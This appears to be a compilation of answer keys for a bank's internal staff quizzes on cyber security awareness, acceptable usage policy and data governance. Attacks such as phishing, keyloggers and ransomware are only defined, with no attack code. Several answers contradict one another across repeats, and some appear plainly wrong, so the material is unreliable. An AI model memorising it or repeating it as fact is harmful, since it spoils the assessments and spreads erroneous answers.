A: Supply chain attack occurs when hackers infiltrate systems through an outside partner or provider who has access to the target systems and data

Q: What is a Denial of Service attack?
A: It is a malicious attempt to disrupt the normal traffic of a targeted server, service or network with a flood of Internet traffic from multiple computers at the same time

Q: While doing an ATM transaction, a customer is required to use a physical card provided to him by the Bank and also a PIN code to authenticate the transaction. This practice ensures which of the following triad of Information Security?
A: Confidentiality

Q: Which of the following principles of the second of CIA Triad Integrity is/are Correct?
A: Use of a secure Hashing algorithm for the information ensures Integrity.

LESSON 4
1
Which one of the following is the most important aspect for an organization as big and global as SBI to
protect itself from cyber security attacks and subsequent loss of brand image?
A training awareness program that would provide education and guidance on a range of information security topics
to all the internal users of its systems and applications.

2
Who is primarily responsible for reporting cyber security incidents?
Deputy General Manager (AC) at LHO

3
Which one of the following options does not substantiate the Acceptable Usage Policy of our Bank?
However, Mobile and laptop given to the staff for personal holding have exceptions to the policy.

4
Which of the following statements is NOT correct in the WannaCry case?
The attackers collective called The Lazarus Group.

5
Identify some of the risks involved in using public free WiFi.
All of the above statements are correct

6
Websites use CAPTCHA to avoid password guessing by automated tools to prevent from _______.
Dictionary Attack

7
Which one of the following options is not a concern for password security?
In case of any breach in a Social Media Handle, delete your Social Media Account instead of changing the password.

8
Which of the following incident(s) should be reported to RBI, CERT-In & NCIIPC?
All of the above

9
If a Bank always allows some of the employees to bring their own laptops, smart phones, tablets etc. to office for office work, this policy is called BYOD. What does BYOD stand for?
Bring Your Own Device

10
Can we create the password in other regional language (Other than English and Hindi) in Retail Internet Banking?
You can use the multilingual image based virtual keyboard in Hindi or English only.

11
Pick the odd one.
Passwords should not be treated like signatures.

12
Select the wrong statement about the Acceptable usage policy (IS Policy) of our Bank?
All are true

13
Which of the following statements is not true about Acceptable usage policy (IS Policy) of our Bank?
Employee’s mobile devices need not have Antivirus software

14
What action will you take when you are defrauded?
Lock the user access immediately

15
The company asked their employees to use their own devices and internet access while working from home.
List some precautions that they could have exercised even under these conditions: (i) Ensuring that authorized
antivirus is installed in the devices of the employees (ii) Ensuring that appropriate software patches are updated
in the devices of the employees (iii) Asking the employees to use enterprise VPN
Options (i) , (ii) and (iii) are necessary

16
Which of the following options is NOT the best password security practices?
Change your password, only if you suspect it may have been exposed

17
Which one of the following options is not considered as an incident for reporting to RBI, NCIIPC and CERT-In?
All of the above

18
Which of the following statements is correct regarding creation of Profile password using the Multilingual Image
based Virtual keyboard?
The Profile password should be a combination of alphabets (in the language chosen), and numerals and special
characters

19
Which one of the following applications is not a threat to compromise confidentiality of the data of portable devices?
Air watch agent

20
What are the ways you can report an unauthorised transaction (ATM) without visiting the branch?
Call dedicated number 1800 1111 09 also Can raise through https://crcf.sbi.co.in

21
Which of the following steps would not be a part of the planning for Work from home?
Ensuring the physical access to the systems room is restricted and monitored

22
Which of the following will not be considered as cyber incidents for reporting to RBI?
All the options will not be considered

23
Select the correct statement in this case.
Ransomware Malware uses simple encryption codes to encrypt a victim’s files.

24
Which one of the following options is NOT a violation of acceptable usage policy?
There was a data vulnerability due to lack of Anti-virus

25
What are the timelines for reporting of cyber incidents to RBI and other Statutory Authorities CERT-In & NCIIPC? Who should report the incident?
All cyber security incidents should be reported within 2 to 6 hours by Incident Response & Management Team

26
Which of the following options is an example of inappropriate use of the e-mail service?
Use of other officers' user ids or using a false identity.

27
Cyber security incidents can be reported
by any employee or public

28
Method that is NOT suggested to prevent new account fraud.
Contact the bank immediately and ensure all the operating accounts are closed

29
What should be the minimum and maximum length of the login password in Retail Internet Banking?
Minimum length should be 8 characters and maximum length 20 characters

30
Select the wrong statement.
For web security, verify full URL by clicking the link, but do not give any personal/confidential information


Q: Method that is NOT suggested to prevent new account fraud.


A: Contact the bank immediately and ensure all the operating accounts are closed

Q: Can we create the password in other regional language (Other than English and
Hindi) in Retail Internet Banking?
A: You can use the multilingual image based virtual keyboard in Hindi or English
only.

Q: Which one of the following options is not a violation of acceptable usage policy?
A: Receiving mails from his batchmate

Q: Impact of Cyber risks are_________________
A: All of the above

Q: What is the “Time of detection of incident” for reporting the purpose of a cyber
incident to RBI, CERT-In & NCIIPC?
A: Time at which, the incident is brought to the knowledge of any official of AO,
including DGM & Module CISO

Q: Which of the following options is NOT a good wi-fi security practice?
A: You can use unsecure or open Wi-Fi for official purposes in case of emergency

Q: Pick the odd one.
A: Passwords should not be treated like signatures.

Q: Select the wrong statement.
A: It is not necessary to inform your organization always, if you come across any discrepancies.

Q: As part of IS awareness and commemoration of Computer Security Day, SBI did NOT organize which one of the following activities?
A: Cold calling all the employees

Q: “Ransomware” can be spread through _____________?
A: Option 1 and 2

Q: Who can report cyber incidents to Information Security Department (ISD)?
A: Anyone who knows about cyber incidents including general public

Q: Which of the following statements is correct regarding creation of Profile
password using the Multilingual Image based Virtual keyboard?
A: The Profile password should be a combination of alphabets (in the language
chosen), and numerals and special characters

Q: Which of the following is NOT one of the best practices to maintain your
password?
A: Only difficult dictionary words should be used

Q: Customer reported an unauthorised UPI transaction of Rs.72,000/- in his account. He reported the incident on the same day to the bank. The bank is not able to establish customer negligence even after completion of 90 days from the date of complaint. As per Limiting Liability of customer guidelines, how much amount does the Bank need to pay to the customer in this situation?
A: Rs.72,000/-

Q: Select the wrong statement about the Acceptable usage policy (IS Policy) of our
Bank?
A: Successful backup of critical applications or data should be ensured yearly and to
be kept offsite.

Q: The time at which the cyber incident is brought to the knowledge of any official of
__________ shall be treated as time of detection of incident.
A: Information Security Dept. CC Mumbai

Q: Select the wrong statement about Desktop / Laptops /Workstations Usage?
A: Create a shortcut of a document/file instead of copying it on the desktop

Q: Cyber security incidents can be reported
A: by any employee or public

Q: Which of the following options is crucial in any UPI fraud related to Collect
request?
A: option a & b

Q: Which of the following options is NOT the best password security practices?
A: Change your password, only if you suspect it may have been exposed

Course Name: Data Governance & Cyber Security
Topic Name: Module 1
(Marks obtained 26/30)
1. Who can be called Data Stakeholders: All of the above
2. Data Governance Organisation involves a multi-tiered combination of
business and technology roles which include(s): All of the above
3. ________________is ultimately accountable with regard to the
definition, Data quality and value of Data in a given subject area.: None of
the above
4. Data governance processes primarily must focus on __________: Business
Needs
5. What is the frequency of the meeting for Apex level Data Governance
Council (ADGC)?: Quarterly
6. Data Governance includes: All of the above
7. Administrative office Data Governance Council (A-DGC), is headed by:
DGM B & O
8. What are the main sources for low Data Quality? All of the above
9. Data Governance Council-Business Unit/Vertical is being headed by: All of
the above
10.(i) Data Governance is about the rules how to build the content. (ii) Data
Privacy is about the rules how to protect and use the content.: Both are
correct
11.At the time of account opening, it was found that Educational Qualification was not mentioned by the customer in AOF, but it is a mandatory field in CBS: Teller should contact the customer and then fill in CBS
12.As per the Data Governance Policy, who is Data Owner?: Branch Manager
13.Analytics refers to the process of using Data in order to: All of the above
14.Data is always originated within the organization: False
15.Which of the following is/are a Key Data Quality Dimension?: All of the
above
16.Providing training to staff is one of the responsibilities of Data Privacy
Officer: True
17.Where does Data come from?: People, Process and Technology
18.Apex level Data Governance Council (ADGC), is headed by: Chairman
19.Data Management with lack of easy access to information for important
stakeholders may result in just _________: Big Data Strategy
20.Poor Data Quality may result in ______: Incorrect Regulatory Reporting
21.Data processes must Include ____________: All of the above
22.Which among the following may be held accountable for quality of data?
People
23.____ is DGO of Circle: DGM and CFO
24.Data Management Office (DMO) is headed by: GM and CDMO
25.Data Governance Policy is applicable to all the domestic offices of SBI
including: All of the above
26.Who would be held responsible for not feeding all the customer details in CBS, given by customer in AOF?: Both Maker and Checker
27.________shall ensure that there is commensurate adherence,
management and periodic upkeep/review for Data in their respective
custodies, as prescribed by Data Governance Policy: Data Custodians
28.Data Governance Council (DGC) is presently being headed by: DMD and
CIO
29.Prime objective of Data governance framework is to ensure- All of the
above
30.Data processes must Include ____________: All of the above
31.DBAs are NOT part of Data Stakeholders: FALSE
32.What is the frequency of the meeting for Data Governance Council-
Business Unit/ Vertical (DGC-BU/V)?: Quarterly
33.Technology Solutions which help in data Governance initiatives include
______: All of the Above
34.Process for submission and handling of the Data request is mentioned in:
Both
35._________________is ultimately accountable with regard to the
definition, Data quality and value of Data in a given subject area: Data
Custodian
36.Data processes must Include ____________: All of the Above
37.Who among the following has a role to ensure that data governance
initiatives are aligned with business needs: Data Team
38.Inconsistent Data in Annual Income fields vis a vis customer profile may
primarily result in ________: Incorrect AML/CFT compliance
39.Where does Data come from? People, Process and Technology
40.Data Governance Policy is applicable to third parties having access to SBI
network and Data.: TRUE
41.What is/are the responsibility(ies) of the Data Governance Council (DGC):
All of the above
42.Against availability of sizeable number of eligible customers only few
confirmed leads could be generated for an Analytics based product. What
could be the underlying reason? Poor Data Quality
43.Data Governance process includes activities as: Audit, Monitor & Control
of Data Governance activities: All of the above
44.Data Governance Policy is applicable to: All employees of the Bank
45.Prime objective of Data governance framework is to ensure- All of the
above
46.Data Management Office reports to which of the DMDs: DMD & Chief
Information Officer
47.Data Governance can NOT be achieved by Technology alone: TRUE
48.As per the Bank's Data Governance structure, presently which is the Apex
body for Data Governance?: Apex level Data Governance Council (ADGC)
49.Which of the following is/are a Key Data Quality Dimension? All of the
above
50.The primary priority of Data Processes must be _____ Business Needs
51.________shall ensure that there is commensurate adherence,
management and periodic upkeep/review for Data in their respective
custodies, as prescribed by Data Governance Policy: Data custodians
52.Which among the following play major role in support of company-wide
Data quality initiatives? Regulators
53.Data Governance Policy is formulated by which Department: Data
Management Office
54.Data-driven business decisions are possible when _____ is involved in the
Data Governance.: Business Unit
55.____ is DGO of Circle: DGM & CRO
56.Data governance processes primarily must focus on __________: Business
Needs
57.Data processes must Include ____________: Definitions of how data will
be moved and changed
58.Data processes must also put in place ______: All of the Above
59.The word “Data” shall collectively refer to the following descriptions: All
of the above
60.Analytics refers to the process of using Data in order to: All of the above
Module 2:
Data Quality and Data Divergence (Score 29/30)
1. India is coming with its own Bill on Data Protection which is called ___:
Personal Data Protection Bill
2. In case of demand for customer Data by Regulatory Authority, it be shared
as per DG Policy: True
3. Sharing of customer sensitive granular Data is governed by which Policy :
Data Governance Policy
4. A staff can be held accountable for Data quality errors.: True
5. Capturing of incorrect security in secured loan accounts may result in
_____________.: Both 1 and 2
6. While inputting temporary address of a customer in CBS, it should be
taken care that: From & To date in the temp screen needs to be filled as
declared by the customer.
7. In an Account Opening Form, if Data has been provided by customer in
non mandatory field ( like mobile number /email ID ), what should be
done while inputting in CBS?: input the data exactly as entered by the
customer
8. Which of the following is not a type of Data leak: Submission of P report
in Hard copy to controller.
9. Business Leads from Analytics comes under Customer Sensitive Granular
Data: True
10.What are the impacts of not verifying the pop-up name of PAN holder,
while fetching PAN details: Both 1 & 2
11.If a car dealer asks us for a list of customers having existing car loans, to
market loans for new cars for us, shall we share the list?: Cannot be shared
12.Salient features of Project Ganga include: All of the above
13.Which of the following is not one of the functions of an effective Data Loss
Prevention (DLP) program: Follow up with data users
14.What is/are the possible consequences of Data Leakage: All of the above
15.Project Ganga Dashboard include divergences related to:: Both DQ and
KRI
16.Which of the following documents should be referred for operational
details while handling requests for sharing Customer Sensitive Granular
Data within Bank’s environment: SOP on Customer
17.A customer has submitted Voter Card as OVD, along with AOF. During the
scrutiny, it was found that the age of customer is less than 18: DOB on
OVD and AOF
18.Objectives of Data Quality are:
i. Accuracy, validity
ii. timeliness, completeness
iii. uniqueness, consistency
None of the above
19.Main Pillars of Data Quality Management are
A) Data Profiling
B) Defining Data Quality
C) Data Reporting
D) Data Repair
A, B, C, D
20.DQI dashboard displays errors: All of the above
21.As per Data Protection Bill (Draft) PII stands for: Personally Identifiable
Information
22.“Internal audit reports” is classified as ____________ Data: Confidential
23.A customer has submitted Driving License as OVD, along with AOF. During
the scrutiny, it was found that the age of customer is less than 18: DOB
and AOF to be checked… to be accepted.
24.Government provided IDs (PAN, License, Passport, etc.), Customer age,
Customer's gender, Customer phone number, Customer address,
Customer occupation are classified as: Sensitive
25.Which of the following are examples of Sensitive Information:: All of the
above
26.“Training materials and manuals” are classified as ____________ Data:
Internal
27.While verifying the pop-up name of PAN holder in CIF creation screen: 1
&3
28.Capturing of incorrect interest rate in loan accounts may result in
_____________.: All of the above
29.Non-sensitive Information includes: Both 1 and 2
30.An SBI Card employee sitting in a branch asks for list of high value
customers along with Mobile numbers for telecalling to sell SBI cards for
the Branch. Branch may share the list with SBI Card employee.: False
31.Which of the following is not one of the functions of an effective Data Loss
Prevention (DLP) program
Follow-up with Data users for Data Quality enhancement
32.As per Data Protection Bill (Draft) PII stands for: Personally Identifiable
Information
33.Branch has sanctioned a Car loan to one of his staff, but the loan
instalment was not fed in HRMS. The staff paid the instalment through his
account and informed the BM that a SI has been registered for the same:
Recovery to staff loan should be through HRMS only, so recovery details
in HRMS needs to be updated
34.Customer Sensitive Granular Data made available through SSO to ensure
an audit trail comes under which one of the following? Need to Access
35.In ________________ Processing, small group of transactions are
processed on demand: Batch
36.Updated policies or SOPs on Data Governance can be accessed through?
SBI Times >> MIS Online >> SOPs >> Data Analytics
37.“Card Holder Details, CIF, Account Information (credentials, balance,
transactions, premiums, dividends, etc.)” are classified as: SENSITIVE
38.Salient features of Project Ganga include: All of the above
39.Impact of poor Data Quality on a Branch include ____: Both 1 & 2 above
40.Data quality is necessary to fulfil the needs of an organization in terms of
: All of the above
41.While inputting temporary address of a customer in CBS, it should be
taken care that:
"From & To" date in the temporary screen needs to be filled in as declared
by the customer
42.If, there is slight mis-match in Customer name in OVD and AOF, customer
name as in AOF has to be fed in CBS, as it is declared by the customer:
Customer needs to be advised for rectification of name in OVD, and then
open account
43.A customer has submitted Driving License as OVD, along with AOF. During
the scrutiny, it was found that the age of customer is less than 18: DOB on
OVD and AOF to be checked, even then he is less than 18 yrs, OVD not to
be accepted
44.A staff can be held accountable for Data quality errors. : TRUE
45.What does GDPR stand for- General Data Protection Regulation
46.Responsibilities of the Customer Sensitive Granular Data User include the
following, except
:Customer Sensitive Granular Data can be copied, stored, processed or
altered by the user and no specific approval required.
47.Customer sensitive Granular Data can be copied and stored without any
approval: FALSE
48.Some of the key Data Privacy initiatives include: All of the above
49.As per the Bank’s approved “SOP on Data Sharing with External Agencies/
Third Parties” which of the following is NOT to be considered as “Third
Party”: Internal Auditors
50.“Customer PII Data” is classified as ____________ Data: SENSITIVE
51.Which of the following is not a type of Data leak: Submission of monthly
P-report to controller in hard copy
52.What are the different categories of Data Classification: SENSITIVE,
CONFIDENTIAL, INTERNAL, PUBLIC
53.What are the possible means by which Customer Sensitive Granular Data
can get divulged or leaked to any unrelated person / third party like
vendors, dealers etc:: All of the above
54.Capturing of incorrect security in secured loan accounts may result in
_____________: Both 1 & 2
55.Which Portal to be accessed for Data Loss Prevention (DLP) incidents:
Data Infringement Portal
56.A customer has submitted Voter Card as OVD, along with AOF. During the
scrutiny, it was found that the age of customer is less than 18: DOB on
OVD and AOF, if same, then only account may be opened
57.Which of the following is true: All of the above
58.DQI Index has been included as one of the Key Responsibility Areas (KRAs)
in Career Development System (CDS): TRUE
59.“SOP on Data Sharing with External agencies/ Third Parties” rests on four
pillars, which one of the following is NOT one of these four pillars: Bank is
free to use/process/share customers’ Data in whatever way it may desire
60.Scope of Customer Sensitive Granular Data Sharing & Access Framework
covers: All of the above
Module 3 (23/30)
1. What is a keylogger?
a) It is a facility that saves the user's password so that he need not enter it
every time.
b) It is a software that facilitates the user to discontinue the use of the
mouse.
c) It is a facility to the user so that he need not type the same keys every time.
d) It is a surveillance software that records every keystroke made in the
system, creates a file and sends it to a specified server
2. Which one of the following statements is more appropriate in terms of
Vendor risk assessment?
a) Vendor risk assessment is not required when the sourced service does not
directly impact company's core operations
b) Vendor security practices need to be assessed before awarding the
contract
c) Vendor software coding practices need not be assessed
d) Continuous assessment of Vendor security practices need to be done
throughout the Contract life cycle.
3. Cyber-attacks that originate through a third party vendor are also called
a) Vendor attacks
b) Supply chain attacks
c) Supplier attacks
d) Service provider attacks
4. How does the use of Virtual keyboard protect the customer?
a) It protects against computer Worms.
b) It protects against computer Viruses
c) It is a useless feature
d) It protects against Keylogger malware
5. What is not true about SIM Swapping?
a) SIM Swapping is a fraud that occurs when the fraudsters manage to get a
new SIM card issued for a specific registered mobile number
b) Phishing or social engineering techniques are used to obtain personal
information of the customers/users.
c) Fraudsters get access to the root of the mobile phone through SIM
Swapping
d) Option b & c
6. The fraudster gets the personal details of the people through
a) Social engineering
b) Spoofing
c) Keylogger malware
d) Vishing

7. Which one of the following is a precaution to be taken while operating the
ATM?
a) Check if any extra suspicious device is attached to the ATM machine.
b) Allow another person to watch while entering PIN
c) Taking help from unknown persons if there is a problem with the ATM
d) Handing of card to other person who offered help to operate ATM
8. The habit of obtaining the confidential information of your colleagues by
direct observation from a vantage position is called
a) Spying over the shoulder
b) Direct observation
c) Shoulder surfing
d) Shoulder spying
9. The objective of setting up a wide network of ATMs across the country
resembles which of the following triad of CIA?
a) Availability
b) Integrity
c) Confidentiality
d) None of the above
10. What is the full form of MITB Attack?
a) Man in the Bait
b) Man in the Botnet
c) Man in the Bluesnarfing
d) Man in the Browser
11. Which one of the following statements is FALSE about APT attacks?
a) In APT attacks, attacker code may spread into other machines in the
victim's network and compromise them.
b) A type of cyberattack where an unauthorized attacker code enters a
system and remains there.
c) APT attacks may help the attacker in stealing information
d) APT attacks may be identified immediately as it shuts down the whole
system
12. If you click on the padlock sign in the Address bar, which of the following
information will be available to you?
a) You will get information on who has created the site
b) You will get information on the IT company that maintains the site
c) You will get information on who owns the site and who has verified the
site
d) You will get information on Reserve Bank of India
13. What makes SolarWinds attack an unusual hack?
a) The hackers seriously damaged the energy supply
b) The hackers through one malicious code in the application of SolarWinds
vendor's application gained access to Orion software
c) The hackers targeted a government agency like Pentagon
d) The hackers through one malicious code in SolarWinds Orion software
gained access to thousands of other companies.
14. What is a Denial of Service attack?
a) It is a malicious attempt to disrupt the normal traffic of a targeted server,
service or network with a flood of Internet traffic from multiple computers
at the same time
b) It is an attack meant to shut down a machine or network, making it
inaccessible to its intended users
c) A type of attack whereby malicious commands are sent to a
system/application through unauthorized channels.
d) An attack used to monitor and potentially modify communications
between two users.
15. Pretending to be an Airtel customer service executive and contacting the
victim is called
a) Phishing
b) Spoofing
c) Smishing
d) Vishing
16. A Cyber-Attack
a) is not limited to, stealing, altering or destroying the systems/network,
disrupting operations and causing information or identity theft
b) is a targeted assault on the Bank's cyberspace and its underlying
infrastructure systems
c) option a or b
d) option a & b
17. SBI internet banking site provides a facility to bypass such keylogger
malware. Identify the feature.
a) Image Captcha
b) Online Virtual Keyboard
c) Audio Captcha
d) Biometric access
18. Which of the following Mobile Apps may be suggested to resolve the issues
related to non-receipt of OTP (Through SMS) for their transaction?
a) SBI Secure OTP
b) SBI Quick
c) YONO Lite
d) BHIM SBI Pay
19. A fraudster may use Social engineering techniques to steal critical
information of a user. Which of the following options is not true in case of social
engineering?
a) Utilizing manipulative methods to obtain (confidential) information
through unauthorized methods
b) Social engineering uses Human traits, Curiosity, Concern around and
technical hacking techniques
c) In Social engineering attacks, the fraudsters lure/appeal to the potential
victims to gain confidence to reveal confidential information and use the
same for fraud and system access.
d) Social engineering is to gain access to sensitive information, systems or
data by using human psychology
20. Which of the following options is not a way to protect yourself from keyloggers?
a) Check your physical hardware, keep your system locked
b) Antivirus, and protect from unauthorised access. Companies keep their
records of the most common malware keyloggers and will flag them as
dangerous.
c) Use a reputable antivirus software to scan your computer on a regular
basis.
d) Regularly inspect your computer and the surrounding area to make sure
you know each piece of hardware.
21. Select the incorrect option.
a) Dark Web - Illegal Information & Private forums
b) Deep Web - Internet Banking & Hidden wiki
c) Surface Web - Facebook & Wikipedia
d) Deep Web - Research Papers & Medical Records
22. What is not true about SIM Swapping?
a) SIM Swapping is also known as SIM Jacking
b) SIM Swapping is also known as SIM cloning
c) SIM Swapping is also known as port out scamming
d) All are true

23. The malware which can record the keystrokes on a keyboard in order to gain
access to sensitive information is known as ________ malware.
a) Keylogger
b) Scareware
c) Spyware
d) Fileless
24. Even if a user compromises his/her login credentials of OnlineSBI, no one can
login using this credential. What is the new security feature in OnlineSBI?
a) Audio Captcha in the login screen.
b) Virtual keyboard in the login screen
c) OTP has been made mandatory at the time of login
d) Image based Captcha in the login screen
25. _____________ is a technique used by the fraudsters, wherein they penetrate a system where
the program/script/files will be hidden within another file.
a) Man in the Middle attack
b) Steganography
c) Phishing
d) Spoofing

26. If a Cyber attack is carried out by sending to SBI's customers an email that
claims to be from SBI but it's not, then what kind of cyber attack technique is it?
a) DOS Attack
b) State Sponsored attacks
c) Phishing Attack
d) Web defacing
27. Which of the following principles of the first element of the CIA Triad, Confidentiality,
is/are correct?
a. Confidentiality is the concept of the measures used to ensure the
protection of the secrecy of data, objects, or resources.
b. The goal of confidentiality protection is to prevent unauthorized access
to the information.
c. Confidentiality focuses security measures on ensuring that none other
than the sender of a message is able to read it.
d. Secure encryption of the information ensures Confidentiality.
a) Only a and b
b) a, b and c
c) a, c and d
d) a, b and d
28. Your friend fears that he has shared the user credentials of OnlineSBI with a
stranger. It is a Sunday and Bank is closed. What immediate steps would you
NOT advise him?
a) Type an incorrect login password 4 times so that the username gets
locked for a day
b) Change the password
c) Contact the Branch on Monday to deactivate INB facility
d) Lock User access using the relevant link

29. Which of the following principles of the second element of the CIA Triad, Integrity, is/are
correct?
a. Integrity is the concept of protecting the accuracy and completeness of
information and processing methods.
b. Integrity protection prevents any kind of alteration of the information.
c. Properly implemented integrity protection provides a means for authorized
changes while protecting against intended and malicious unauthorized activities
(such as viruses and intrusions) as well as mistakes made by authorized users (by
commission or omission).
d. Use of a secure Hashing algorithm for the information ensures Integrity.
a) Only a and b
b) a, b and c
c) a, c and d
d) a, b and d
30. Which one is not an option for disabling UPI services?
a) YONO Main Screen UPI Enable/Disable UPI
b) CBS App menu UPI Disable/Re-enable UPI
c) Branch Interface (Maker-Checker Concept)
d) Contact Centre: 1800112211/18004253800
31.What is not true about Juice-jacking? Disabling data transfer mode in
Settings will not help in this case
32.The data loss or compromise while charging the mobile is
called________.: Juice Jacking
33.Even if a user compromises his/her login credentials of OnlineSBI, no one
can login using this credential. What is the new security feature in
OnlineSBI?: OTP has been made mandatory at the time of login
34._____________ is used for obtaining unauthorized access to mobile
phones via Bluetooth connection. Once such a connection is established
then the attacker will be able to steal photos, messages and contacts etc.:
Bluesnarfing
35.Your friend fears that he has shared the user credentials of OnlineSBI with
a stranger. It is a Sunday and Bank is closed. What immediate steps would
you NOT advise him?
Contact the Branch on Monday to deactivate INB facility
36.Which of the following is NOT an objective of Non-repudiation?
It offers a high level of assurance that the information, objects and
resources are accessible to authorized subjects within the promised
timeframe.
37.Which of the following is not an example of data?
All are examples of data
38.Which one of the following statements is more appropriate in terms of
Vendor risk assessment? Continuous assessment of Vendor security
practices need to be done throughout the Contract life cycle.
39.What makes SolarWinds attack an unusual hack?
The hackers through one malicious code in the application of SolarWinds
vendor’s application gained access to Orion software
40.Non-repudiation is carried out through the services of authentication,
authorization, confidentiality, and integrity. Confidentiality ensures which
one of the following?
Secure encryption of the information
41.Select the wrong statement.: Option a & b
42.Pretending to be an Airtel customer service executive and contacting the
victim is called____________.: Vishing
43.Which one of the following is the leading illicit dark web marketplace
which was taken down by the FBI in what was considered then as a
significant action on the Dark web market?
Silk Road 2.0
44.A fraudster may use Social engineering techniques to steal critical
information of a user. Which of the following options is not true in case of
social engineering?
Social engineering uses Human traits, Curiosity, Concern around and
technical hacking techniques
45.Which one of the following statements is false?
Bulk SMS is sending SMS from mobile to many people.
46.What is not true about SIM Swapping?
SIM Swapping is also known as SIM cloning
47.Which of the following attacks is not categorised under Exploit based
attacks?
Distributed Denial of Service attacks
48.If a Cyber attack is carried out by sending to SBI's customers an email that
claims to be from SBI but it's not, then what kind of cyber attack technique
is it?
Phishing Attack
49.Mr. Ajay had tried to login to Mr. Deepak's SBI net banking. He tried thrice
but failed. Now when Mr. Deepak tries to login with his correct password
will he be able to do so?
After 3 invalid attempts, the user id is automatically locked for one day.
Thereafter Mr. Deepak can login.
50.What is a “Collect Request” in a UPI transaction?
It is a feature available in BHIM SBI Pay
51.If you want to change the username and password for your SBI Internet
banking, which of the following statements is correct?
You cannot change the Username but he/she can change the password at
any time
52._____________ is a technique used by the fraudsters, wherein they
penetrate a system where the program/script/files will be hidden within
another file.
Steganography
53.The technique used to send the emails to all the employees of the Bank is
known as ____________.
Spear Phishing
54.If a hacker manages to exploit the vulnerability before software
developers can find a fix, that exploit becomes known as a _______.
Zero day attack
55.Third party attacks are attractive to hackers, because ____________.
Third party systems have less robust security controls
56.What makes SolarWinds hack one of the biggest and the most dangerous
Cyber attack?
This attack was designed to impact one vendor and subsequently all their
clients
57.Where is the option to lock user access in SBI Retail Internet Banking?
Lock User access option is available in the login page of Retail INB
58.__________ malware is a warning-like popup or reminder in a
Laptop/PC/Mobile?
Scareware
59.Social Engineering Attacks does not include ________________.
Denial of Service attack
60.Which one of the following statements is FALSE about APT attacks?
APT attacks may be identified immediately as it shuts down the whole
system
DGCS: Module 4 (24/30)
1. Which of the following steps would not be a part of the planning for Work
from home?
a) Arranging official laptops with proper configuration for the employees
b) Providing connectivity through a reputed service provider
c) Ensuring the physical access to the systems room is restricted and
monitored
d) Installing Anti-Virus in these systems

2. Select the correct statement in this case.
a) The patches could not stop the spreading malware
b) Ransomware Malware affects more devices in less time.
c) Ransomware Malware uses simple encryption codes to encrypt a victim’s
files.
d) The motive for this Ransomware attack is always monetary

3. Which one of the following options is NOT a violation of acceptable usage
policy?
a) There was a data vulnerability due to lack of Anti-virus
b) The laptop was not protected by password
c) There was a breach of critical and confidential data.
d) The laptop was kept open, and the desktop was not locked

4. “Ransomware” can be spread through _____________?
1) Malicious email attachments and Malicious apps
2) Infected external storage devices and Compromised websites
3) Option 1 or 2
4) Option 1 and 2

5. Which of the following options is crucial in any UPI fraud related to Collect
request?
a) QR Code of your Virtual Payment Address
b) Your Virtual Payment Address
c) Your Account no.
d) option a & b
6. As part of IS awareness, SBI observes Computer Security Day on which of the
following day?
a) 01st April
b) 01st October
c) 30th November
d) 30th September
7. What is the meaning of Shadow Reversal?
a) Reversal of loss amount to customer account if Bank fails to resolve the
customer complaint within 90 days and it is allowed to withdraw by
customer
b) Reversal of loss amount to customer account if Bank fails to establish
customer negligence within 10 days, but it is not allowed to withdraw by
customer
c) Reversal of loss amount to customer account if Bank fails to resolve the
customer complaint within 90 days, but it is not allowed to withdraw by
customer
d) Reversal of loss amount to customer account if Bank fails to establish
customer negligence within 10 days, but it is allowed to withdraw by
customer
8. What action will you take, when you are defrauded?
a) Change the username immediately
b) Write a letter to the RBI immediately
c) Lock the user access immediately
d) Send a written letter to the branch immediately
9. Select the wrong statement about the Acceptable usage policy (IS Policy) of
our Bank?
a) Users should not install any software that is not authorized for the Bank’s
business.
b) Users on whose PC / Server such software runs shall be solely responsible
for Copyrights / IPR violation, Legal and Penal actions as per IT Act
c) Successful backup of critical applications or data should be ensured yearly
and to be kept offsite.
d) All are true
10. Which of the following options is an example of inappropriate use of the e-mail service?
a) Use the accounts of others with their permission
b) Authorized exchange of proprietary information or confidential
information
c) Use of other officers' user ids or using a false identity.
d) Creation and exchange of e-mails information or content for official
purpose.
11. Select the wrong statement about Desktop / Laptops /Workstations Usage?
a) Lock your PC by pressing Windows key + L
b) There is nothing important on my computer is a myth
c) Create a shortcut of a document/file instead of copying it on the desktop
d) Always lock your desktop, when you are away from it.
12. Which one of the following options does not substantiate the Acceptable
Usage Policy of our Bank?
a) Always lock your desktop while leaving your seat.
b) We need to protect the data by following acceptable usage policy
guidelines of our bank.
c) However, Mobile and laptop given to the staff for personal holding have
exceptions to the policy.
d) All the workstations / devices should be protected by strong passwords.
13. Which of the following options is not a violation of acceptable usage policy?
a) Users shall be responsible for the activities carried out on their client
systems, using the accounts assigned to them.
b) The User is responsible for any e-mail that is transmitted using the e-mail
c) Use of personal mail of Bank’s official for his personal purposes is
acceptable.
d) All e-mails sent through the mail server are the sole responsibility of the
user owning the account
14. Which of the following is NOT inappropriate content of email?
a) Sending absence unsolicited emails and links.
b) Sending mail that damages the reputation of the Bank, contains viruses,
worms, or malware
c) Confidential or secret information with a password protection when
transmitted over email.
d) Using email systems to copy and transmit any document, software or
other information protected by copyright or any other law.
15. If ATM Skimming happens at an ATM, who can report to IT Team?
a) ATM Channel Manager
b) Anyone
c) Branch Manager
d) option a & b
16. Select the correct statement about Desktop / Laptops /Workstations Usage?
a) Creation of email shortcut on the home screen of desktop
b) Anti-virus is crucial for safety of data. While leaving the room user is
supposed to put the laptop for scanning.
c) Locking by pressing Windows key and L key simultaneously.
d) Shutting down the laptop
17. Which one of the following options is not a concern for password security?
a) Password should be treated like signature
b) Users are responsible for all activities originated from their User
credentials
c) In case of any breach in a Social Media Handle, delete your Social Media
Account instead of changing the password.
d) Password is required to be sufficiently long and secret
18. Cyber security incidents can be reported
a) by home branch only
b) by any employee
c) by public
d) by any employee or public

19. Impact of Cyber risks are _________________.
a) Loss of Intellectual Property and reputational damage
b) Cost
c) Financial loss & Business disruption
d) All of the above
20. Select the wrong statement.
a) Do not play online games on company devices as they may download
trojans.
b) For online meetings, Manage screen sharing options. Change screen
sharing to “Host Only.” Avoid file sharing
c) Secure your Wi-Fi router connections by enabling WPA2 + AES security
d) For web security, verify full URL by clicking the link, but do not give any
personal/confidential information
21. Pick the correct ones as a good practice? (i) We should install a standard
antivirus in our laptop (ii) We should restrict access to the laptop by using a
strong password (iii) We should avoid using a free WiFi
a) Options (i) , (ii) and (iii) are correct
b) Options (i) and (ii) are correct
c) Option (iii) alone is correct
d) Options (ii) and (iii) are correct
22. What is the “Time of detection of incident” for reporting the purpose of a
cyber incident to RBI, CERT-In & NCIIPC?
a) Time at which, the incident is brought to the knowledge of any official of
AO, including DGM & Module CISO
